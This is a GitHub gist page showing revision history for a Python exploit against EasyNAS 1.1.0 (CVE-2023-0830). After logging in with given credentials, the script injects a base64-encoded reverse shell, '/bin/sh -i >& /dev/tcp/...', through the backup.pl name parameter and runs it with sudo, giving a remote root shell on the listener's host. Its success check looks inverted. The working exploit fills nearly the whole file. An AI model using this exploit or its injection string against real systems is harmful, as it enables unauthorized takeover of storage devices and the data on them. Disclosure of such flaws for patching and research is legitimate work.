Last active
November 2, 2023 16:09
Revisions
-
xbz0n revised this gist
Feb 15, 2023 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,7 +2,7 @@ # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.1.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 -
Feb 14, 2023 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ # Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com -
Feb 14, 2023 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,11 +1,11 @@ # Exploit Title: EasyNas 1.1.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 #!/usr/bin/python3 -
Feb 9, 2023 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Feb 9, 2023 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,74 @@ # Exploit Title: EasyNas 1.0.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-X #!/usr/bin/python3 import requests import sys import base64 import urllib.parse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable the insecure request warning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") sys.exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] # Create the payload payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) # Encode the payload in base64 payload = base64.b64encode(payload.encode()).decode() # URL encode the payload payload = urllib.parse.quote(payload) # Create the login data login_data = { 'usr':user, 'pwd':password, 'action':'login' } # Create a session session = requests.Session() # Send the login request print("Sending login request...") login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) # Check if the login was successful if 'Login to EasyNAS' in login_response.text: print("Unsuccessful login") sys.exit() else: print("Login successful") # send the exploit request timeout = 3 try: exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) if exploit_response.status_code != 200: print("[+] Everything seems ok, check your listener.") else: print("[-] Exploit failed, system is patched or credentials are wrong.") except requests.exceptions.ReadTimeout: print("[-] Everything seems ok, check your listener.") sys.exit()